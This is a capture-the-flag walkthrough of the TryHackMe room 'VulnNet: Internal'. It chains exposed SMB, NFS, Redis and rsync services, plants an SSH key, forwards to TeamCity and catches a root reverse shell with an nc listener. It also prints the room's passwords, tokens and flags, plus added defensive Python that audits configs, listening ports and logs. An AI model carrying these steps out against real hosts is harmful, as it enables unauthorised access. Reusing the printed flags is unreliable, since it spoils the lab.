  • Room author: TheCyb3rW0lf
  • Operating system: Linux (required)
  • Difficulty: Easy/Medium

LINK: https://tryhackme.com/room/vulnnetinternal

Description:
VulnNet Entertainment is a company that learns from its mistakes. They quickly realised they could not build a properly secured web application, so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, your task is to carry out a penetration test of their network and report your findings.
This machine was designed to be the exact opposite of the previous machines in this series and focuses on internal services. It should show you how to retrieve interesting information and use it to gain access to the system. Report your findings by submitting the correct flags.

LET'S START BY FINDING THE SERVICES FLAG:

  • We start straight away with an Nmap scan for open ports:

    PORT      STATE    SERVICE     VERSION
    22/tcp    open     ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
    |   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
    |_  256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
    111/tcp   open     rpcbind     2-4 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100003  3           2049/udp   nfs
    |   100003  3           2049/udp6  nfs
    |   100003  3,4         2049/tcp   nfs
    |   100003  3,4         2049/tcp6  nfs
    |   100005  1,2,3      35973/tcp   mountd
    |   100005  1,2,3      50743/udp   mountd
    |   100005  1,2,3      50821/tcp6  mountd
    |   100005  1,2,3      60228/udp6  mountd
    |   100021  1,3,4      33804/udp6  nlockmgr
    |   100021  1,3,4      35968/udp   nlockmgr
    |   100021  1,3,4      38965/tcp6  nlockmgr
    |   100021  1,3,4      44305/tcp   nlockmgr
    |   100227  3           2049/tcp   nfs_acl
    |   100227  3           2049/tcp6  nfs_acl
    |   100227  3           2049/udp   nfs_acl
    |_  100227  3           2049/udp6  nfs_acl
    139/tcp   open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp   open     netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
    873/tcp   open     rsync       (protocol version 31)
    2049/tcp  open     nfs_acl     3 (RPC #100227)
    6379/tcp  open     redis       Redis key-value store
    9090/tcp  filtered zeus-admin
    35973/tcp open     mountd      1-3 (RPC #100005)
    39613/tcp open     mountd      1-3 (RPC #100005)
    42041/tcp open     java-rmi    Java RMI
    44305/tcp open     nlockmgr    1-4 (RPC #100021)
    49833/tcp open     mountd      1-3 (RPC #100005)
    Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Let's enumerate Samba:

    ┌──(user㉿parrot)-[/data/VulnNet_Internal]
    └─$ smbclient -L 10.10.190.83                              
    Enter WORKGROUP\kali's password: 
    
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        shares          Disk      VulnNet Business Shares
        IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
    SMB1 disabled -- no workgroup available
  • Fortunately we can access the share without credentials and read the contents of the services.txt file, which contains the flag we need:

    ┌──(user㉿parrot)-[/data/VulnNet_Internal]
    └─$ smbclient //10.10.190.83/shares
    Enter WORKGROUP\kali's password: 
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                   D        0  Tue Feb  2 10:20:09 2021
      ..                                  D        0  Tue Feb  2 10:28:11 2021
      temp                                D        0  Sat Feb  6 12:45:10 2021
      data                                D        0  Tue Feb  2 10:27:33 2021
    
            11309648 blocks of size 1024. 3275768 blocks available
    smb: \> cd temp
    smb: \temp\> ls
      .                                   D        0  Sat Feb  6 12:45:10 2021
      ..                                  D        0  Tue Feb  2 10:20:09 2021
      services.txt                        N       38  Sat Feb  6 12:45:09 2021
    
            11309648 blocks of size 1024. 3275768 blocks available
    smb: \temp\> get services.txt -
    THM{0a09d51e488f5fa105d8d866a497440a}
    getting file \temp\services.txt of size 38 as - (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

    We have therefore found the FLAG: THM{0a09d51e488f5fa105d8d866a497440a}

LET'S MOVE ON TO THE INTERNAL FLAG:

The Nmap scan revealed an NFS share, which we mount and inspect:

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ mkdir tmp/

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ sudo mount -t nfs 10.10.190.83: tmp     
                                                                                                                     
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ tree tmp             
tmp
└── opt
    └── conf
        ├── hp
        │   └── hplip.conf
        ├── init
        │   ├── anacron.conf
        │   ├── lightdm.conf
        │   └── whoopsie.conf
        ├── opt
        ├── profile.d
        │   ├── bash_completion.sh
        │   ├── cedilla-portuguese.sh
        │   ├── input-method-config.sh
        │   └── vte-2.91.sh
        ├── redis
        │   └── redis.conf
        ├── vim
        │   ├── vimrc
        │   └── vimrc.tiny
        └── wildmidi
            └── wildmidi.cfg
  • Note that the exported redis.conf file contains the password for the Redis server in plaintext:

    ┌──(user㉿parrot)-[/data/…/files/opt/conf/redis]
    └─$ grep -Ev "^#|^$" redis.conf
    rename-command FLUSHDB ""
    rename-command FLUSHALL ""
    bind 127.0.0.1 ::1
    protected-mode yes
    port 6379
    tcp-backlog 511
    timeout 0
    tcp-keepalive 300
    daemonize yes
    supervised no
    pidfile /var/run/redis/redis-server.pid
    loglevel notice
    logfile /var/log/redis/redis-server.log
    databases 16
    always-show-logo yes
    save 900 1
    save 300 10
    save 60 10000
    stop-writes-on-bgsave-error yes
    rdbcompression yes
    rdbchecksum yes
    dbfilename dump.rdb
    dir /var/lib/redis
    slave-serve-stale-data yes
    requirepass "B65Hx562F@ggAZ@F" <-------------------- password
    slave-read-only yes
    repl-diskless-sync no
    repl-diskless-sync-delay 5
    repl-disable-tcp-nodelay no
    slave-priority 100
    lazyfree-lazy-eviction no
    lazyfree-lazy-expire no
    lazyfree-lazy-server-del no
    slave-lazy-flush no
    appendonly no
    appendfilename "appendonly.aof"
    appendfsync everysec
    no-appendfsync-on-rewrite no
    auto-aof-rewrite-percentage 100
    auto-aof-rewrite-min-size 64mb
    aof-load-truncated yes
    aof-use-rdb-preamble no
    lua-time-limit 5000
    slowlog-log-slower-than 10000
    slowlog-max-len 128
    latency-monitor-threshold 0
    notify-keyspace-events ""
    hash-max-ziplist-entries 512
    hash-max-ziplist-value 64
    list-max-ziplist-size -2
    list-compress-depth 0
    set-max-intset-entries 512
    zset-max-ziplist-entries 128
    zset-max-ziplist-value 64
    hll-sparse-max-bytes 3000
    activerehashing yes
    client-output-buffer-limit normal 0 0 0
    client-output-buffer-limit slave 256mb 64mb 60
    client-output-buffer-limit pubsub 32mb 8mb 60
    hz 10
    aof-rewrite-incremental-fsync yes
  • Let's connect to Redis with that password and look for the flag among the stored keys:

    ┌──(user㉿parrot)-[/data/…/files/opt/conf/redis]
    └─$ redis-cli -h 10.10.190.83 -a "B65Hx562F@ggAZ@F"
    Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
    10.10.190.83:6379> ping
    PONG
    
    10.10.190.83:6379> KEYS *
    1) "tmp"
    2) "marketlist"
    3) "authlist"
    4) "internal flag"
    5) "int"
    10.10.190.83:6379> 
    10.10.190.83:6379> KEYS "internal flag"
    1) "internal flag"
    10.10.190.83:6379> GET "internal flag"
    "THM{ff8e518addbbddb74531a724236a8221}"
  • The flag is: THM{ff8e518addbbddb74531a724236a8221}
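The redis.conf found on the NFS export is worth more than the flag: it is the kind of file a defender should expect to be audited whenever it leaks. The following Python is an added example, not part of the room or the room author's writeup. It parses a redis.conf the same way the `grep -Ev "^#|^$"` above does (dropping comments and blank lines) and reports the settings that matter when the file is readable by the wrong people: a plaintext `requirepass`, the `bind` scope, `protected-mode`, and which dangerous commands were disabled via `rename-command`. The sample configuration is constructed to mirror the one on the page, with the real password replaced by a placeholder.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: a trimmed redis.conf in the same shape as the file found
# on the NFS export. The password is a placeholder, not the room's value.
SAMPLE_REDIS_CONF = """\
# Redis configuration file
rename-command FLUSHDB ""
rename-command FLUSHALL ""
bind 127.0.0.1 ::1
protected-mode yes
port 6379

daemonize yes
dir /var/lib/redis
requirepass "PLACEHOLDER-PASSWORD"
appendonly no
"""


def parse_redis_conf(text: str) -> List[Tuple[str, List[str]]]:
    """Return (directive, args) pairs, skipping comments and blank lines
    exactly as `grep -Ev "^#|^$"` does. Quoted arguments are unquoted,
    so `rename-command FLUSHDB ""` yields an empty-string argument."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.findall(r'"([^"]*)"|(\S+)', line)
        tokens = [quoted if quoted else bare for quoted, bare in parts]
        entries.append((tokens[0].lower(), tokens[1:]))
    return entries


def audit_redis_conf(text: str) -> Dict[str, str]:
    """Summarise the settings a reviewer cares about when a redis.conf turns
    up somewhere it should not be (an NFS export, a backup, a file share)."""
    directives: Dict[str, List[List[str]]] = {}
    for name, args in parse_redis_conf(text):
        directives.setdefault(name, []).append(args)

    findings: Dict[str, str] = {}

    # A password in the file means anyone who can read the file can log in.
    if "requirepass" in directives:
        last = directives["requirepass"][-1]
        pw = last[0] if last else ""
        findings["requirepass"] = (
            "plaintext password present (%d chars); anyone who can read "
            "this file can authenticate" % len(pw)
        )
    else:
        findings["requirepass"] = "no password configured"

    # No bind line, or a wildcard address, means the instance is network-facing.
    binds = [a for args in directives.get("bind", []) for a in args]
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings["bind"] = "listens on all interfaces"
    else:
        findings["bind"] = "bound to " + ", ".join(binds)

    pm = directives.get("protected-mode", [["yes"]])[-1]
    findings["protected-mode"] = (
        "enabled" if pm and pm[0].lower() == "yes" else "disabled"
    )

    # rename-command <CMD> "" removes the command entirely.
    disabled = [
        args[0].upper()
        for args in directives.get("rename-command", [])
        if len(args) >= 2 and args[1] == ""
    ]
    findings["disabled-commands"] = ", ".join(disabled) if disabled else "none"
    return findings


if __name__ == "__main__":
    for key, value in audit_redis_conf(SAMPLE_REDIS_CONF).items():
        print("%-18s %s" % (key, value))
```

One caveat the page itself illustrates: this exported file says `bind 127.0.0.1 ::1`, yet `redis-cli` connected from the attacking host and the later `ss -ltp` output shows Redis on `0.0.0.0:6379`. A configuration file found on a share is evidence, not ground truth; confirm against the running instance (for example with `redis-cli CONFIG GET bind` on the host) before concluding the service is loopback-only.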

USER FLAG:

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ redis-cli -h 10.10.190.83 -a "B65Hx562F@ggAZ@F"                       
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.190.83:6379> KEYS *
1) "internal flag"
2) "authlist"
3) "marketlist"
4) "int"
5) "tmp"
10.10.190.83:6379> GET authlist
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.190.83:6379> LRANGE authlist 1 100
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
10.10.190.83:6379> 

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ rsync --list-only rsync://10.10.190.83                                                                     23 ⨯
files           Necessary home interaction

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ cp ~/.ssh/id_rsa.pub authorized_keys

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ rsync authorized_keys rsync://rsync-connect@10.10.190.83/files/sys-internal/.ssh                            3 ⨯

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ ssh sys-internal@10.10.190.83        
sys-internal@vulnnet-internal:~$ cat user.txt 
THM{da7c20696831f253e0afaca8b83c07ab}

USER FLAG: THM{da7c20696831f253e0afaca8b83c07ab}



ROOT FLAG:

sys-internal@vulnnet-internal:/$ ls -la /
total 533824
drwxr-xr-x  24 root root      4096 Feb  6 12:58 ./
drwxr-xr-x  24 root root      4096 Feb  6 12:58 ../
drwxr-xr-x   2 root root      4096 Feb  2 14:05 bin/
drwxr-xr-x   3 root root      4096 Feb  1 14:02 boot/
drwx------   2 root root      4096 Feb  1 13:41 .cache/
drwxr-xr-x  17 root root      3720 May 27 07:34 dev/
drwxr-xr-x 129 root root     12288 Feb  7 19:21 etc/
drwxr-xr-x   3 root root      4096 Feb  1 13:51 home/
lrwxrwxrwx   1 root root        34 Feb  1 14:01 initrd.img -> boot/initrd.img-4.15.0-135-generic
lrwxrwxrwx   1 root root        33 Feb  1 13:30 initrd.img.old -> boot/initrd.img-4.15.0-20-generic
drwxr-xr-x  18 root root      4096 Feb  1 13:43 lib/
drwxr-xr-x   2 root root      4096 Feb  1 13:28 lib64/
drwx------   2 root root     16384 Feb  1 13:27 lost+found/
drwxr-xr-x   4 root root      4096 Feb  2 10:49 media/
drwxr-xr-x   2 root root      4096 Feb  1 13:27 mnt/
drwxr-xr-x   4 root root      4096 Feb  2 10:28 opt/
dr-xr-xr-x 136 root root         0 May 27 07:33 proc/
drwx------   8 root root      4096 Feb  6 13:32 root/
drwxr-xr-x  27 root root       880 May 27 08:37 run/
drwxr-xr-x   2 root root      4096 Feb  2 14:06 sbin/
drwxr-xr-x   2 root root      4096 Feb  1 13:27 srv/
-rw-------   1 root root 546529280 Feb  1 13:27 swapfile
dr-xr-xr-x  13 root root         0 May 27 08:39 sys/
drwxr-xr-x  12 root root      4096 Feb  6 13:30 TeamCity/ <----------------------- interesting
drwxrwxrwt  11 root root      4096 May 27 08:40 tmp/
drwxr-xr-x  10 root root      4096 Feb  1 13:27 usr/
drwxr-xr-x  13 root root      4096 Feb  1 13:43 var/
lrwxrwxrwx   1 root root        31 Feb  1 14:01 vmlinuz -> boot/vmlinuz-4.15.0-135-generic
lrwxrwxrwx   1 root root        30 Feb  1 13:30 vmlinuz.old -> boot/vmlinuz-4.15.0-20-generic

sys-internal@vulnnet-internal:~$ ss -ltp
State       Recv-Q       Send-Q                    Local Address:Port                       Peer Address:Port       
LISTEN      0            50                              0.0.0.0:microsoft-ds                    0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:39391                           0.0.0.0:*          
LISTEN      0            64                              0.0.0.0:nfs                             0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:33735                           0.0.0.0:*          
LISTEN      0            5                               0.0.0.0:rsync                           0.0.0.0:*          
LISTEN      0            50                              0.0.0.0:netbios-ssn                     0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:6379                            0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:sunrpc                          0.0.0.0:*          
LISTEN      0            64                              0.0.0.0:34769                           0.0.0.0:*          
LISTEN      0            128                       127.0.0.53%lo:domain                          0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:ssh                             0.0.0.0:*          
LISTEN      0            5                             127.0.0.1:ipp                             0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:33145                           0.0.0.0:*          
LISTEN      0            50                   [::ffff:127.0.0.1]:57882                                 *:*          
LISTEN      0            50                                 [::]:microsoft-ds                       [::]:*          
LISTEN      0            64                                 [::]:nfs                                [::]:*          
LISTEN      0            50                                    *:9090                                  *:*          
LISTEN      0            1                    [::ffff:127.0.0.1]:8105                                  *:*          
LISTEN      0            5                                  [::]:rsync                              [::]:*          
LISTEN      0            128                               [::1]:6379                               [::]:*          
LISTEN      0            50                                 [::]:netbios-ssn                        [::]:*          
LISTEN      0            100                  [::ffff:127.0.0.1]:8111                                  *:*  <------------ TeamCity running on localhost on port 8111        
LISTEN      0            128                                [::]:sunrpc                             [::]:*          
LISTEN      0            64                                 [::]:33363                              [::]:*          
LISTEN      0            128                                [::]:40659                              [::]:*          
LISTEN      0            128                                [::]:ssh                                [::]:*          
LISTEN      0            50                                    *:35095                                 *:*          
LISTEN      0            128                                [::]:38359                              [::]:*          
LISTEN      0            5                                 [::1]:ipp                                [::]:*          
LISTEN      0            128                                [::]:46425                              [::]:*    
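The `ss -ltp` listing is the most useful defensive artefact on this box: it shows which services are reachable from the network (`0.0.0.0` / `*` / `[::]`) and which are loopback-only (`127.0.0.1`, `[::1]`, `[::ffff:127.0.0.1]`). The following Python is an added example, not part of the room or the writeup, that parses this output and groups listening ports by bind scope, then reports any port that should have been local-only but is exposed. The sample lines are constructed from a subset of the output above; the "should be local" set is an assumption chosen to match this host (Redis and TeamCity).

```python
from typing import Dict, Set, Tuple

# Constructed sample modelled on a subset of the `ss -ltp` output in the writeup.
SAMPLE_SS = """\
State       Recv-Q       Send-Q                    Local Address:Port                       Peer Address:Port
LISTEN      0            50                              0.0.0.0:microsoft-ds                    0.0.0.0:*
LISTEN      0            128                             0.0.0.0:6379                            0.0.0.0:*
LISTEN      0            128                       127.0.0.53%lo:domain                          0.0.0.0:*
LISTEN      0            128                             0.0.0.0:ssh                             0.0.0.0:*
LISTEN      0            5                             127.0.0.1:ipp                             0.0.0.0:*
LISTEN      0            50                                    *:9090                                  *:*
LISTEN      0            128                               [::1]:6379                               [::]:*
LISTEN      0            100                  [::ffff:127.0.0.1]:8111                                  *:*
LISTEN      0            128                                [::]:ssh                                [::]:*
"""

LOOPBACK = {"127.0.0.1", "::1", "::ffff:127.0.0.1"}
WILDCARD = {"0.0.0.0", "*", "::", "::ffff:0.0.0.0"}


def split_local(local: str) -> Tuple[str, str]:
    """Split ss's Local Address:Port field into (address, port), handling
    bracketed IPv6, IPv4-mapped IPv6 and the %iface scope suffix."""
    addr, _, port = local.rpartition(":")
    addr = addr.strip("[]")
    addr = addr.split("%", 1)[0]   # 127.0.0.53%lo -> 127.0.0.53
    return addr, port


def classify(addr: str) -> str:
    """'any' (network-reachable), 'loopback', or 'specific' (one interface)."""
    if addr in WILDCARD:
        return "any"
    if addr in LOOPBACK or addr.startswith("127."):
        return "loopback"
    return "specific"


def listening_by_scope(ss_output: str) -> Dict[str, Set[str]]:
    """Group listening ports (as ss prints them, names or numbers) by scope."""
    scopes: Dict[str, Set[str]] = {"any": set(), "loopback": set(), "specific": set()}
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        addr, port = split_local(fields[3])
        scopes[classify(addr)].add(port)
    return scopes


def unexpected_exposure(scopes: Dict[str, Set[str]], should_be_local: Set[str]) -> Set[str]:
    """Ports that policy says must stay on loopback but are bound to a wildcard."""
    return scopes["any"] & should_be_local


if __name__ == "__main__":
    scopes = listening_by_scope(SAMPLE_SS)
    for scope, ports in scopes.items():
        print("%-9s %s" % (scope, ", ".join(sorted(ports))))
    # Assumed policy for this host: Redis and TeamCity are internal-only.
    print("exposed but should be local:", unexpected_exposure(scopes, {"6379", "8111"}))
```

Run against the output above, the check reports `6379` as exposed (Redis is bound to `0.0.0.0` despite the `bind 127.0.0.1` seen in the exported redis.conf), while `8111` (TeamCity) correctly stays on loopback, which is exactly why the SSH port forward in the next step is needed to reach it.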

$ ssh -L 8111:127.0.0.1:8111 sys-internal@10.10.190.83

sys-internal@vulnnet-internal:/TeamCity$ grep -iR token /TeamCity/logs/ 2>/dev/null
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 4174796436262174108 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 4174796436262174108 (use empty username with the token as the password to access the server)
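TeamCity writes its super-user token to catalina.out in clear text, and here the log directory was readable by an unprivileged user, so a plain grep recovers a credential that grants full administrative access. The following Python is an added example, not part of the room or the writeup, showing the check a defender would run: find the tokens that have been logged, test whether the log file is readable by group or others, and produce a redacted copy suitable for forwarding to a central log store. The sample log lines are constructed (the token values are made up) and the temporary file with mode 0644 is an assumption standing in for a real log directory.

```python
import os
import re
import stat
import tempfile
from typing import Dict, List

TOKEN_RE = re.compile(r"Super user authentication token:\s*(\d+)")

# Constructed sample lines in the shape of the catalina.out entries found in
# /TeamCity/logs; the token values are made up.
SAMPLE_LOG = """\
[TeamCity] Server started
[TeamCity] Super user authentication token: 1111111111111111111 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1111111111111111111 (use empty username with the token as the password to access the server)
INFO - jetbrains.buildServer.SERVER - Build agent connected
[TeamCity] Super user authentication token: 2222222222222222222 (use empty username with the token as the password to access the server)
"""


def find_superuser_tokens(text: str) -> List[str]:
    """Unique super-user tokens in the order they were first logged."""
    seen: List[str] = []
    for m in TOKEN_RE.finditer(text):
        if m.group(1) not in seen:
            seen.append(m.group(1))
    return seen


def redact_tokens(text: str) -> str:
    """Replace each logged token with a marker before the log leaves the host."""
    return TOKEN_RE.sub(lambda m: m.group(0).replace(m.group(1), "[REDACTED]"), text)


def readable_by_others(path: str) -> bool:
    """True if group or world read bits are set on the file."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


def log_exposure_report(path: str) -> Dict[str, object]:
    """How many distinct tokens a log file exposes and whether non-owners can read it."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        tokens = find_superuser_tokens(fh.read())
    return {
        "tokens_logged": len(tokens),
        "readable_by_others": readable_by_others(path),
    }


def demo_report() -> Dict[str, object]:
    """Write the sample log to a temporary file with the permissive 0644 mode
    (an assumption mirroring a world-readable log directory) and report on it."""
    with tempfile.NamedTemporaryFile("w", suffix=".out", delete=False) as fh:
        fh.write(SAMPLE_LOG)
        path = fh.name
    os.chmod(path, 0o644)
    try:
        return log_exposure_report(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo_report())
    print(redact_tokens(SAMPLE_LOG))
```

The two findings the report surfaces map directly onto the fix: restrict the TeamCity log directory to the service account, and treat any token that has already been written to a readable log as burned (regenerate it) rather than relying on redaction after the fact.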

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ nc -nlvp 4444    
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.190.83] 48482
bash: cannot set terminal process group (481): Inappropriate ioctl for device
bash: no job control in this shell
root@vulnnet-internal:/TeamCity/buildAgent/work/2b35ac7e0452d98f# cat /root/root.txt
THM{e8996faea46df09dba5676dd271c60bd}

ROOT FLAG: THM{e8996faea46df09dba5676dd271c60bd}
